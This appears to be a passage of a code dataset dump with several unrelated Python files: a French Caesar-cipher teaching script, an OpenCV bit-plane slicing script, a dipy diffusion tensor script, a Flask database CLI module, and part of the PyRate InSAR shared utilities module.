interceptCryptoOnly(c):\r\n \"\"\"\r\n Teste l'ensemble des cles possibles pour retrouver le message en clair\r\n\r\n Renvoie une liste de 26 chaines de caracteres.\r\n \"\"\"\r\n\r\n dicoSol = [c]\r\n print(\"CLE:\\tMESSAGE:\")\r\n for i in range(1,26):\r\n tmp = dechiffrementCesar(c, i)\r\n print('{0}\\t{1}'.format(i, tmp))\r\n dicoSol.append(tmp)\r\n # ...\r\n\r\n return dicoSol\r\n # ...\r\n\r\n @staticmethod\r\n def interceptCouplesConnus(m, c):\r\n \"\"\"\r\n un message en clair et son cryptogramme.\r\n\r\n Renvoie la cle de chiffrement\r\n \"\"\"\r\n\r\n\r\n if not isValidMessage(m):\r\n m = getMessage(m)\r\n # ...\r\n\r\n if not isValidMessahe(c):\r\n c = getMessage(c)\r\n # ...\r\n\r\n # Il nous suffit ici d'observer le premier element de chacune des deux chaines de caracteres\r\n m0 = m[0]\r\n c0 = c[0]\r\n\r\n m0 = ord(m0) - minUpperLetter\r\n c0 = ord(c0) - minUpperLetter\r\n\r\n kc = m0 - c0\r\n if kc < 0:\r\n kc = kc + 26\r\n # ...\r\n\r\n return kc\r\n #...\r\n\r\n# ...\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n m = 'Salut je viens de Villetaneuse'\r\n key = 8\r\n c = Cesar.encrypt(m,key , 5)\r\n print('Message en clair: ', m)\r\n print(\"Clef: \", key)\r\n print('Cryptogramme: ',c)\r\n print('Test decrypt: ', Cesar.decrypt(c, 8))\r\n #decryptCesarCryptogrammeSeul(c)\r\n\r\n# ...","sub_path":"src/cesar.py","file_name":"cesar.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"195759390","text":"\n\nimport cv2\nimport copy\nimport numpy as np \nfrom matplotlib import pyplot as plt\n\nimageNmae = 'blue'\ngrayImage = cv2.imread(imageNmae+'.jpg',0)\n#grayImage = cv2.cvtColor(grayImage, cv2.COLOR_BGR2GRAY)\n\nbinaries = [0b00000001,0b00000010,0b00000100,0b00001000,0b00010000,\n 0b00100000,0b01000000,0b10000000]\n\nprint (binaries)\n\norgImage = copy.copy(grayImage)\n\nbit = 7\n\ncompImage = np.zeros((grayImage.shape[0],grayImage.shape[1]))\n\nwhile bit>=0:\n \n grayImage=copy.copy(orgImage)\n imgpos = 0\n grayImage=cv2.bitwise_and(grayImage,binaries[bit])\n cv2.imwrite(imageNmae+str(bit)+'bitSlice.jpg',grayImage)\n imgpos=imgpos+1\n if(bit>=4):\n compImage = compImage + grayImage\n bit=bit-1\n \ncv2.imwrite(imageNmae+\"comp\"+'.jpg',compImage)","sub_path":"Compression/compress.py","file_name":"compress.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"286838615","text":"from dipy.io.gradients import read_bvals_bvecs\nfrom dipy.core.gradients import gradient_table\nimport nibabel as nib\nimport numpy as np\nimport dipy.reconst.dti as dti\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n\ndef load_nifti(file_name_with_extension):\n directory = os.path.dirname(os.path.realpath(__file__))\n file_name = directory + '\\\\tp3_data\\\\' + file_name_with_extension\n image = nib.load(file_name)\n return image\n\n# loading image and gradient table\nbvals_filename=\"tp3_data\\\\bvals2000\"\nbvecs_filename=\"tp3_data\\\\bvecs2000\"\ndtipeaks_filename = \"tp3_data\\\\_peaks\"\ntensor_filename = \"tp3_data\\\\_tensor\"\nimg_filename = \"dwi2000.nii.gz\"\n\nbvals, bvecs = read_bvals_bvecs(bvals_filename, bvecs_filename)\ngtab = gradient_table(bvals, bvecs)\nimg = load_nifti(img_filename)\n\n##### utilisation d'un mask pour le calcul du tenseur\ntenmodel = dti.TensorModel(gtab)\nbrain_mask = nib.load(\"tp3_data\\\\_mask.nii.gz\").get_data()\ntenfit = tenmodel.fit(img.get_data(), mask=brain_mask)\n\n##### sauvegarde des orientations principales\npeaks_fiberNav = np.zeros((112, 112, 60, 15), dtype='float32')\npeaks_fiberNav[:, :, :, 0:3] = tenfit.evecs[..., 0].astype(np.float32)\nnib.save(nib.Nifti1Image(peaks_fiberNav, img.get_affine()), dtipeaks_filename)\n\n##### sauvegarde des tenseurs\nfrom dipy.reconst.dti import lower_triangular\ntensor_vals = lower_triangular(tenfit.quadratic_form)\ncorrect_order = [0, 1, 3, 2, 4, 5]\ntensor_vals_reordered = tensor_vals[..., correct_order]\nfiber_tensors = nib.Nifti1Image(tensor_vals_reordered.astype(np.float32), img.get_affine())\nnib.save(fiber_tensors, tensor_filename)\n\n##### Affichage d'une tranche coronale\ntenseurs = load_nifti(\"_tensor.nii\").get_data()\norientation = load_nifti(\"_peaks.nii\").get_data()\n\nfig = plt.figure()\nfig.add_subplot(121)\nplt.title(\"Tenseurs\")\nplt.axis('off')\nplt.imshow(tenseurs[:, tenseurs.shape[1]/2, :, 0], cmap=cm.gray)\nfig.add_subplot(122)\nplt.title(\"Orientations Principales\")\nplt.axis('off')\nplt.imshow(orientation[:, orientation.shape[1]/2, :, 0], cmap=cm.gray)\n\nplt.savefig(os.path.dirname(os.path.realpath(__file__)) + \"\\\\..\" + \"\\\\Latex\\\\Images\\\\Tenseurs_orientation.png\")\nplt.show()\n\n","sub_path":"Scripts/tenseurs.py","file_name":"tenseurs.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"303830089","text":"import sqlite3\nfrom flask import Flask\nfrom flask_pymongo import PyMongo\nimport click\n# g is a namespace object that can store data during an application context\n# read: https://flask.palletsprojects.com/en/1.1.x/appcontext/\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\nfrom core import mongo_db\nfrom core.algorithm.SentimentAnalysis import SentimentAnalysis\nfrom core.algorithm.CompressedTrie import CompressedTrie\nfrom core.algorithm.DTW import AudioAnalysis\n\n\ndef init_app(app: Flask):\n \"\"\"Initialize app for registering functions\"\"\"\n # call that function when cleaning up after returning the response\n # app.teardown_appcontext(close_db)\n # new command that can be called with the flask command\n app.cli.add_command(init_db_command)\n app.cli.add_command(generate_compressed_trie)\n app.cli.add_command(run_audio_analysis)\n \n\n\ndef get_db():\n if 'db' not in g:\n # mongo = PyMongo(current_app)\n # g.db = mongo.db\n g.db = mongo_db\n\n # return the connection of db which is stored in g\n return g.db\n\n\ndef close_db(e=None):\n db = g.pop('db', None)\n\n if db is not None:\n db.close()\n\n\ndef init_db():\n \"\"\"Initialize database\"\"\"\n db = get_db()\n # insert some data\n data_list = SentimentAnalysis.retrieve_all()\n db.analysis.remove({})\n for data in data_list:\n filter = {\n \"courier\":data['courier'],\n \"url\":data['url']\n }\n db.analysis.update_one(filter=filter, update={\"$set\":data}, upsert=True)\n\n\n\n@click.command('init-db')\n# https://click.palletsprojects.com/en/7.x/api/#click.command\n# defines a command line command called init-db that calls the init_db function\n@with_appcontext\n# https://flask.palletsprojects.com/en/1.1.x/api/#flask.cli.with_appcontext\n# guaranteed to be executed with the script’s application context\ndef init_db_command():\n \"\"\"Clear the existing data and create new tables.\"\"\"\n init_db()\n click.echo('Initialized the database.')\n\n@click.command('gen-compressed-trie')\n@with_appcontext\ndef generate_compressed_trie():\n \"\"\"Regenerate compressed trie for string matching\"\"\"\n ct = CompressedTrie()\n ct.run_generate_compressed_trie()\n click.echo('Generated compressed trie')\n\n@click.command('run-audio-analysis')\n@with_appcontext\ndef run_audio_analysis():\n \"\"\"Rerun audio analysis using DTW\"\"\"\n tr = AudioAnalysis()\n tr.run_audio_analysis()\n click.echo('Performed DTW audio analysis')","sub_path":"core/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"55704034","text":"# This Python module is part of the PyRate software package.\n#\n# Copyright 2017 Geoscience Australia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis Python module contains utilities and classes shared by\nall other PyRate modules.\n\"\"\"\n# pylint: disable=too-many-lines\nfrom __future__ import print_function\nimport errno\nimport logging\nimport math\nfrom math import floor\nimport os\nfrom os.path import basename, dirname, join\nimport shutil\nimport stat\nimport struct\nfrom datetime import date\nfrom itertools import product\nimport numpy as np\nfrom numpy import where, nan, isnan, sum as nsum, isclose\nimport pyproj\nimport pkg_resources\n\nfrom pyrate import ifgconstants as ifc, mpiops\nfrom pyrate import roipac, gamma, config as cf\n\nVERBOSE = True\nlog = logging.getLogger(__name__)\n\ntry:\n from osgeo import osr, gdal\n from osgeo.gdalconst import GA_Update, GA_ReadOnly\nexcept ImportError:\n import gdal\n\ngdal.UseExceptions()\n\n# Constants\nPHASE_BAND = 1\nRADIANS = 'RADIANS'\nMILLIMETRES = 'MILLIMETRES'\nGAMMA = 'GAMMA'\nROIPAC = 'ROIPAC'\n\n# GDAL projection list\nGDAL_X_CELLSIZE = 1\nGDAL_Y_CELLSIZE = 5\nGDAL_X_FIRST = 0\nGDAL_Y_FIRST = 3\n\n\ndef mkdir_p(path):\n \"\"\"\n Copied from stackoverflow.\n \"\"\"\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\nclass RasterBase(object):\n \"\"\"\n Base class for PyRate GeoTIFF based raster datasets.\n \"\"\"\n # pylint: disable=missing-docstring\n # pylint: disable=too-many-instance-attributes\n def __init__(self, path):\n if isinstance(path, gdal.Dataset):\n self.dataset = path # path will be Dataset in this case\n self.data_path = self.dataset # data_path dummy\n self.add_geographic_data()\n else:\n self.data_path = path\n self.dataset = None # for GDAL dataset obj\n self._readonly = not os.access(path, os.R_OK | os.W_OK)\n\n if self._readonly is None:\n raise NotImplementedError # os.access() has failed?\n\n def __str__(self):\n name = self.__class__.__name__\n return \"%s('%s')\" % (name, self.data_path)\n\n def __repr__(self):\n name = self.__class__.__name__\n return \"%s('%s')\" % (name, self.data_path)\n\n def open(self, readonly=None):\n \"\"\"\n Opens generic raster dataset.\n \n :param readonly: True/False, or None to open as underlying file setting \n \"\"\"\n if self.dataset is not None:\n msg = \"open() already called for %s\" % self\n raise RasterException(msg)\n\n if not os.path.exists(self.data_path):\n raise IOError('The file {path} does not exist. Consider running '\n 'prepifg'.format(path=self.data_path))\n\n # unless read only, by default open files as writeable\n if readonly not in [True, False, None]:\n raise ValueError(\"readonly must be True, False or None\")\n\n if readonly is False and self._readonly is True:\n raise IOError(\"Cannot open write protected file for writing\")\n\n flag = GA_ReadOnly if self._readonly else GA_Update\n self.dataset = gdal.Open(self.data_path, flag)\n if self.dataset is None:\n raise RasterException(\"Error opening %s\" % self.data_path)\n\n self.add_geographic_data()\n\n def add_geographic_data(self):\n \"\"\"\n xxxxxx\n \"\"\"\n # add some geographic data\n self.x_centre = int(self.ncols / 2)\n self.y_centre = int(self.nrows / 2)\n self.lat_centre = self.y_first + (self.y_step * self.y_centre)\n self.long_centre = self.x_first + (self.x_step * self.x_centre)\n # use cell size from centre of scene\n self.x_size, self.y_size = cell_size(self.lat_centre, self.long_centre,\n self.x_step, self.y_step)\n\n @property\n def ncols(self):\n \"\"\"\n xxxxxx\n \"\"\"\n return self.dataset.RasterXSize\n\n @property\n def nrows(self):\n \"\"\"\n xxxxxx\n \"\"\"\n return self.dataset.RasterYSize\n\n @property\n def x_step(self):\n \"\"\"\n xxxxxx\n \"\"\"\n return float(self.dataset.GetGeoTransform()[GDAL_X_CELLSIZE])\n\n @property\n def y_step(self):\n \"\"\"\n xxxxxx\n \"\"\"\n return float(self.dataset.GetGeoTransform()[GDAL_Y_CELLSIZE])\n\n @property\n def x_first(self):\n \"\"\"\n xxxxxx\n \"\"\"\n return float(self.dataset.GetGeoTransform()[GDAL_X_FIRST])\n\n @property\n def x_last(self):\n \"\"\"\n xxxxxx\n \"\"\"\n return self.x_first + (self.x_step * self.ncols)\n\n @property\n def y_first(self):\n \"\"\"\n xxxxxx\n \"\"\"\n return float(self.dataset.GetGeoTransform()[GDAL_Y_FIRST])\n\n @property\n def y_last(self):\n \"\"\"\n xxxxxx\n \"\"\"\n return self.y_first + (self.y_step * self.nrows)\n\n @property\n def shape(self):\n \"\"\"\n Returns tuple of (Y,X) shape of the raster (as per numpy.shape).\n \"\"\"\n return self.dataset.RasterYSize, self.dataset.RasterXSize\n\n @property\n def num_cells(self):\n \"\"\"\n xxxxxx\n \"\"\"\n if self.is_open:\n return self.dataset.RasterXSize * self.dataset.RasterYSize\n else:\n raise RasterException('Dataset not open')\n\n @property\n def is_open(self):\n \"\"\"\n Returns True if the underlying dataset has been opened by GDAL.\n \"\"\"\n return self.dataset is not None\n\n def close(self):\n \"\"\"\n Explicitly closes file opened by gdal.Open()\n This is required in Windows, otherwise opened files can not be removed,\n because Windows locks opened files.\n \"\"\"\n if self.is_open:\n self.dataset = None\n\n @property\n def is_read_only(self):\n \"\"\"\n xxxxxx\n \"\"\"\n return self._readonly\n\n def _get_band(self, band):\n \"\"\"\n Wrapper (with error checking) for GDAL's Band.GetRasterBand() method.\n \n :param band: number of band, starting at 1\n \"\"\"\n\n if self.dataset is not None:\n return self.dataset.GetRasterBand(band)\n else:\n raise RasterException(\"Raster %s has not been opened\"\n % self.data_path)\n\n\nclass Ifg(RasterBase):\n \"\"\"\n Interferrogram class, represents the difference between two acquisitions.\n Ifg objects double as a container for related data.\n \"\"\"\n # pylint: disable=too-many-instance-attributes\n def __init__(self, path):\n \"\"\"\n Interferogram constructor, for 2 band ROI_PAC interferogram raster datasets.\n \n :param path: Path to interferogram\n \"\"\"\n\n RasterBase.__init__(self, path)\n self._phase_band = None\n self._phase_data = None\n self.master = None\n self.slave = None\n self.nan_converted = False\n self.mm_converted = False\n self.meta_data = None\n self.wavelength = None\n self._nodata_value = None\n self.time_span = None\n\n def open(self, readonly=None):\n \"\"\"\n Opens generic raster dataset.\n \n :param readonly: True/False, or None to open as underlying file setting\n \"\"\"\n RasterBase.open(self, readonly)\n self.initialize()\n\n def initialize(self):\n \"\"\"\n Basic interferogram properties read on opening interferogram.\n \"\"\"\n self._init_dates()\n md = self.dataset.GetMetadata()\n self.wavelength = float(md[ifc.PYRATE_WAVELENGTH_METRES])\n self.meta_data = md\n # creating code needs to set this flag after 0 -> NaN replacement\n self.nan_converted = False\n\n def _init_dates(self):\n \"\"\"\n Grab master and slave date from metadata.\n \"\"\"\n def _to_date(datestr):\n year, month, day = [int(i) for i in datestr.split('-')]\n return date(year, month, day)\n\n md = self.dataset.GetMetadata()\n datestrs = [md[k] for k in [ifc.MASTER_DATE, ifc.SLAVE_DATE]]\n\n if all(datestrs):\n self.master, self.slave = [_to_date(s) for s in datestrs]\n self.time_span = (self.slave - self.master).days/ifc.DAYS_PER_YEAR\n else:\n msg = 'Missing master and/or slave date in %s' % self.data_path\n raise IfgException(msg)\n\n def convert_to_nans(self):\n \"\"\"\n Converts given values in phase data to NaNs.\n \n :param val: value to convert, default is 0\n \"\"\"\n if (self._nodata_value is None) \\\n or (self.dataset is None): # pragma: no cover\n msg = 'nodata value needs to be set for nan conversion.' \\\n 'Use ifg.nodata_value = NoDataValue to set nodata_value'\n log.warning(msg)\n raise RasterException(msg)\n if ((self.dataset.GetMetadataItem(ifc.NAN_STATUS) == ifc.NAN_CONVERTED)\n or self.nan_converted):\n self.phase_data = self.phase_data\n self.nan_converted = True\n msg = '{}: ignored as previous nan ' \\\n 'conversion detected'.format(self.data_path)\n log.debug(msg)\n return\n else:\n self.phase_data = where(\n isclose(self.phase_data, self._nodata_value, atol=1e-6),\n nan,\n self.phase_data)\n self.meta_data[ifc.NAN_STATUS] = ifc.NAN_CONVERTED\n self.nan_converted = True\n\n @property\n def phase_band(self):\n \"\"\"\n Returns a GDAL Band object for the phase band.\n \"\"\"\n\n if self._phase_band is None:\n self._phase_band = self._get_band(PHASE_BAND)\n return self._phase_band\n\n @property\n def nodata_value(self):\n \"\"\"\n Returns a GDAL Band object for the phase band.\n \"\"\"\n return self._nodata_value\n\n @nodata_value.setter\n def nodata_value(self, val):\n \"\"\"\n xxxx\n \n :param val: xxxx\n \"\"\"\n\n self._nodata_value = val\n\n @property\n def phase_data(self):\n \"\"\"\n Returns entire phase band as an array.\n \"\"\"\n\n if self._phase_data is None:\n self._phase_data = self.phase_band.ReadAsArray()\n return self._phase_data\n\n def convert_to_mm(self):\n \"\"\"\n Convert wavelength from radians to mm.\n \n :param ifg: ifg file\n \"\"\"\n self.mm_converted = True\n if self.dataset.GetMetadataItem(ifc.DATA_UNITS) == MILLIMETRES:\n msg = '{}: ignored as previous phase unit conversion ' \\\n 'already applied'.format(self.data_path)\n log.debug(msg)\n self.phase_data = self.phase_data\n return\n elif self.dataset.GetMetadataItem(ifc.DATA_UNITS) == RADIANS:\n self.phase_data = convert_radians_to_mm(self.phase_data,\n self.wavelength)\n self.meta_data[ifc.DATA_UNITS] = MILLIMETRES\n # self.write_modified_phase()\n # otherwise NaN's don't write to bytecode properly\n # and numpy complains\n # self.dataset.FlushCache()\n msg = '{}: converted phase units ' \\\n 'to millimetres'.format(self.data_path)\n log.debug(msg)\n else: # pragma: no cover\n msg = 'Phase units are not millimetres or radians'\n raise IfgException(msg)\n\n @phase_data.setter\n def phase_data(self, data):\n \"\"\"\n xxxx\n\n :param data: xxxx\n \"\"\"\n self._phase_data = data\n\n @property\n def phase_rows(self):\n \"\"\"\n Generator returning each row of the phase data.\n \"\"\"\n\n for y in range(self.nrows):\n r = self.phase_band.ReadAsArray(yoff=y,\n win_xsize=self.ncols, win_ysize=1)\n yield r[0] # squeezes row from (1, WIDTH) to 1D array\n\n @property\n def nan_count(self):\n \"\"\"\n Returns number of NaN cells in the phase data.\n \"\"\"\n return nsum(isnan(self.phase_data))\n\n @property\n def nan_fraction(self):\n \"\"\"\n Returns 0-1 (float) proportion of NaN cells for the phase band.\n \"\"\"\n if (self._nodata_value is None) or (self.dataset is None):\n msg = 'nodata_value needs to be set for nan fraction calc.' \\\n 'Use ifg.nondata = NoDataValue to set nodata'\n raise RasterException(msg)\n # don't cache nan_count as client code may modify phase data\n nan_count = self.nan_count\n # handle datasets with no 0 -> NaN replacement\n if not self.nan_converted and (nan_count == 0):\n nan_count = nsum(np.isclose(self.phase_data,\n self._nodata_value, atol=1e-6))\n return nan_count / float(self.num_cells)\n\n def write_modified_phase(self, data=None):\n \"\"\"\n Writes phase data to disk.\n For this to work, a copy of the original file\n \n :param data: xxxx\n \"\"\"\n\n if self.is_read_only:\n raise IOError(\"Cannot write to read only Ifg\")\n\n # keep this block\n # if new_data_path is None:\n # self.dataset = gdal.Open(self.data_path, GA_Update)\n # else:\n # self.dataset = gdal.Open(new_data_path, GA_Update)\n # self._phase_band = None\n\n if data is not None:\n assert isinstance(data, np.ndarray)\n data_r, data_c = data.shape\n assert data_r == self.nrows and data_c == self.ncols\n self.phase_data = data\n self.phase_band.WriteArray(self.phase_data)\n for k, v in self.meta_data.items():\n self.dataset.SetMetadataItem(k, v)\n self.dataset.FlushCache()\n\n def save_numpy_phase(self, numpy_file):\n \"\"\"\n Save phase data.\n \n :param numpy_file: File path where phase data is saved\n \"\"\"\n np.save(file=numpy_file, arr=self.phase_data)\n\n\nclass IfgPart(object):\n \"\"\"\n Slice of Ifg data object.\n \"\"\"\n # pylint: disable=missing-docstring\n # pylint: disable=too-many-instance-attributes\n def __init__(self, ifg_or_path, tile, ifg_dict=None):\n\n self.tile = tile\n self.r_start = self.tile.top_left_y\n self.r_end = self.tile.bottom_right_y\n self.c_start = self.tile.top_left_x\n self.c_end = self.tile.bottom_right_x\n # TODO: fix this if cond\n if ifg_dict is not None: # should be used with MPI\n ifg = ifg_dict[ifg_or_path]\n self.nan_fraction = ifg.nan_fraction\n self.master = ifg.master\n self.slave = ifg.slave\n self.time_span = ifg.time_span\n phase_file = 'phase_data_{}_{}.npy'.format(\n basename(ifg_or_path).split('.')[0], tile.index)\n self.phase_data = np.load(join(dirname(ifg_or_path), cf.TMPDIR,\n phase_file))\n else:\n # check if Ifg was sent.\n if isinstance(ifg_or_path, Ifg):\n ifg = ifg_or_path\n else:\n self.data_path = ifg_or_path\n ifg = Ifg(ifg_or_path)\n self.phase_data = None\n self.nan_fraction = None\n self.master = None\n self.slave = None\n self.time_span = None\n if isinstance(ifg, Ifg):\n self.read_required(ifg)\n\n def read_required(self, ifg):\n \"\"\"\n xxxx\n \n :param ifg: xxxx \n \"\"\"\n if not ifg.is_open:\n ifg.open(readonly=True)\n ifg.nodata_value = 0\n self.phase_data = ifg.phase_data[self.r_start:self.r_end,\n self.c_start:self.c_end]\n self.nan_fraction = ifg.nan_fraction\n self.master = ifg.master\n self.slave = ifg.slave\n self.time_span = ifg.time_span\n ifg.phase_data = None\n ifg.close() # close base ifg\n\n @property\n def nrows(self):\n \"\"\"\n xxxx\n \"\"\"\n return self.r_end - self.r_start\n\n @property\n def ncols(self):\n \"\"\"\n xxxx\n \"\"\"\n return self.c_end - self.c_start\n\n\nclass Incidence(RasterBase): # pragma: no cover\n \"\"\"Incidence class.\"\"\"\n\n def __init__(self, path):\n \"\"\"\n Incidence obj constructor.\n \"\"\"\n\n RasterBase.__init__(self, path)\n self._incidence_band = None\n self._azimuth_band = None\n self._incidence_data = None\n self._azimuth_data = None\n\n @property\n def incidence_band(self):\n \"\"\"\n Returns the GDALBand for the incidence angle layer.\n \"\"\"\n\n if self._incidence_band is None:\n self._incidence_band = self._get_band(1)\n return self._incidence_band\n\n @property\n def incidence_data(self):\n \"\"\"\n Returns the entire incidence band as an array.\n \"\"\"\n\n if self._incidence_data is None:\n self._incidence_data = self.incidence_band.ReadAsArray()\n return self._incidence_data\n\n @property\n def azimuth_band(self):\n \"\"\"\n Returns the GDALBand for the azimuth layer.\n \"\"\"\n\n if self._azimuth_band is None:\n self._azimuth_band = self._get_band(2)\n return self._azimuth_band\n\n @property\n def azimuth_data(self):\n \"\"\"\n Returns the entire incidence band as an array.\n \"\"\"\n\n if self._azimuth_data is None:\n self._azimuth_data = self.azimuth_band.ReadAsArray()\n return self._azimuth_data\n\n\nclass DEM(RasterBase):\n \"\"\"\n Generic raster class for ROI_PAC single band DEM files.\n \"\"\"\n\n def __init__(self, path):\n \"\"\"\n DEM constructor.\n \"\"\"\n RasterBase.__init__(self, path)\n self._band = None\n\n @property\n def height_band(self):\n \"\"\"\n Returns the GDALBand for the elevation layer.\n \"\"\"\n\n if self._band is None:\n self._band = self._get_band(1)\n return self._band\n\n\nclass IfgException(Exception):\n \"\"\"\n Generic exception class for interferogram errors.\n \"\"\"\n\n\nclass RasterException(Exception):\n \"\"\"\n Generic exception for raster errors.\n \"\"\"\n\n\nclass EpochList(object):\n \"\"\"\n Metadata container for epoch related information.\n \"\"\"\n\n def __init__(self, dates=None, repeat=None, spans=None):\n self.dates = dates # list of unique dates from all the ifgs\n self.repeat = repeat\n self.spans = spans # time span from earliest ifg\n\n def __str__(self):\n return \"EpochList: %s\" % str(self.dates)\n\n def __repr__(self):\n return \"EpochList: %s\" % repr(self.dates)\n\n\ndef convert_radians_to_mm(data, wavelength):\n \"\"\"\n Translates phase from radians to millimetres.\n \n :param data: Interferogram phase data\n :param wavelength: Radar wavelength; normally included with SAR instrument metadata\n \n :return xxxx\n \"\"\"\n return data * ifc.MM_PER_METRE * (wavelength / (4 * math.pi))\n\n\ndef nanmedian(x):\n \"\"\"\n xxxx \n \n :param x: xxxx\n :return xxxx\n \"\"\"\n # pylint: disable=no-member\n version = [int(i) for i in\n pkg_resources.get_distribution(\"numpy\").version.split('.')]\n if version[0] == 1 and version[1] > 9:\n return np.nanmedian(x)\n else: # pragma: no cover\n return np.median(x[~np.isnan(x)])\n\n\ndef write_geotiff(header, data_path, dest, nodata):\n # pylint: disable=too-many-statements\n \"\"\"\n Writes input image data (interferograms, DEM, incidence maps etc)\n to GeoTIFF format with PyRate metadata.\n \n :param header: xxxx\n :param data_path: xxxx\n :param dest: xxxx\n :param nodata: xxxx\n \n :return xxxx\n \"\"\"\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-locals\n is_ifg = ifc.PYRATE_WAVELENGTH_METRES in header\n is_incidence = 'FILE_TYPE' in header\n ifg_proc = header[ifc.PYRATE_INSAR_PROCESSOR]\n ncols = header[ifc.PYRATE_NCOLS]\n nrows = header[ifc.PYRATE_NROWS]\n\n # need to have gamma/roipac functionality here?\n if ifg_proc == ROIPAC:\n roipac.check_raw_data(is_ifg, data_path, ncols, nrows)\n roipac.check_step_mismatch(header)\n else: # GAMMA\n gamma.check_raw_data(data_path, ncols, nrows)\n gamma.check_step_mismatch(header)\n\n driver = gdal.GetDriverByName(\"GTiff\")\n dtype = gdal.GDT_Float32 if (is_ifg or is_incidence) else gdal.GDT_Int16\n ds = driver.Create(dest, ncols, nrows, 1, dtype)\n\n # write pyrate parameters to headers\n if is_ifg:\n for k in [ifc.PYRATE_WAVELENGTH_METRES, ifc.PYRATE_TIME_SPAN,\n ifc.PYRATE_INSAR_PROCESSOR,\n ifc.MASTER_DATE, ifc.SLAVE_DATE,\n ifc.DATA_UNITS, ifc.DATA_TYPE]:\n ds.SetMetadataItem(k, str(header[k]))\n if ifg_proc == GAMMA:\n for k in [ifc.MASTER_TIME, ifc.SLAVE_TIME, ifc.PYRATE_INCIDENCE_DEGREES]:\n ds.SetMetadataItem(k, str(header[k]))\n elif is_incidence:\n ds.SetMetadataItem(ifc.DATA_TYPE, ifc.INCIDENCE)\n else: # must be dem\n ds.SetMetadataItem(ifc.DATA_TYPE, ifc.DEM)\n\n # position and projection data\n ds.SetGeoTransform([header[ifc.PYRATE_LONG], header[ifc.PYRATE_X_STEP], 0,\n header[ifc.PYRATE_LAT], 0, header[ifc.PYRATE_Y_STEP]])\n\n srs = osr.SpatialReference()\n res = srs.SetWellKnownGeogCS(header[ifc.PYRATE_DATUM])\n\n if res:\n msg = 'Unrecognised projection: %s' % header[ifc.PYRATE_DATUM]\n raise GeotiffException(msg)\n\n ds.SetProjection(srs.ExportToWkt())\n\n # copy data from the binary file\n band = ds.GetRasterBand(1)\n band.SetNoDataValue(nodata)\n\n if ifg_proc == GAMMA:\n fmtstr = '!' + ('f' * ncols) # data format is big endian float32s\n bytes_per_col = 4\n elif ifg_proc == ROIPAC:\n if is_ifg:\n fmtstr = '<' + ('f' * ncols) # roipac ifgs are little endian float32s\n bytes_per_col = 4\n else:\n fmtstr = '<' + ('h' * ncols) # roipac DEM is little endian signed int16\n bytes_per_col = 2\n else: # pragma: no cover\n msg = 'Unrecognised InSAR Processor: %s' % ifg_proc\n raise GeotiffException(msg)\n\n row_bytes = ncols * bytes_per_col\n\n with open(data_path, 'rb') as f:\n for y in range(nrows):\n if ifg_proc == ROIPAC:\n if is_ifg:\n f.seek(row_bytes, 1) # skip interleaved band 1\n\n data = struct.unpack(fmtstr, f.read(row_bytes))\n #else: # GAMMA\n # data = struct.unpack(fmtstr, f.read(ncols * 4))\n\n band.WriteArray(np.array(data).reshape(1, ncols), yoff=y)\n\n # Needed? Only in ROIPAC code\n ds = None # manual close\n del ds\n\n\ndef write_unw_from_data_or_geotiff(geotif_or_data, dest_unw, ifg_proc):\n \"\"\"\n xxxx\n \n :param geotif_or_data: Data or geotiff to covert into unwrapped\n :param dest_unw: Destination unwrapped file\n :param ifg_proc: Processor type, GAMMA=1, ROIPAC=0\n \n :return xxxx\n \"\"\"\n if ifg_proc != 1:\n raise NotImplementedError('only support gamma processor for now')\n if isinstance(geotif_or_data, str):\n assert os.path.exists(geotif_or_data), 'make sure geotif exists'\n ds = gdal.Open(geotif_or_data)\n data = ds.ReadAsArray()\n ds = None\n else:\n data = geotif_or_data\n\n nrows, ncols = data.shape\n fmtstr = '!' + ('f' * ncols) # data format is big endian float32s\n\n with open(dest_unw, 'wb') as f:\n for y in range(nrows):\n col_data = struct.pack(fmtstr, *data[y, :])\n f.write(col_data)\n\n\ndef write_output_geotiff(md, gt, wkt, data, dest, nodata):\n # pylint: disable=too-many-arguments\n \"\"\"\n Writes PyRate output data to a GeoTIFF file.\n \n :param md: Dictionary containing PyRate metadata\n :param gt: GDAL geotransform for the data\n :param wkt: GDAL projection information for the data\n :param data: xxxx\n :param dest: xxxx\n :param nodata: xxxx\n \n :return xxxx\n \"\"\"\n\n driver = gdal.GetDriverByName(\"GTiff\")\n nrows, ncols = data.shape\n ds = driver.Create(dest, ncols, nrows, 1, gdal.GDT_Float32)\n # set spatial reference for geotiff\n ds.SetGeoTransform(gt)\n ds.SetProjection(wkt)\n ds.SetMetadataItem(ifc.EPOCH_DATE, str(md[ifc.EPOCH_DATE]))\n\n # set other metadata\n ds.SetMetadataItem('DATA_TYPE', str(md['DATA_TYPE']))\n # sequence position for time series products\n if 'SEQUENCE_POSITION' in md:\n ds.SetMetadataItem('SEQUENCE_POSITION', str(md['SEQUENCE_POSITION']))\n\n # write data to geotiff\n band = ds.GetRasterBand(1)\n band.SetNoDataValue(nodata)\n band.WriteArray(data, 0, 0)\n\n\nclass GeotiffException(Exception):\n \"\"\"\n Geotiff exception class.\n \"\"\"\n\n\ndef create_tiles(shape, nrows=2, ncols=2):\n \"\"\"\n Shape must be a 2-tuple, i.e., 2d_array.shape.\n The returned list contains nrowsXncols Tiles with each tile preserving the\n 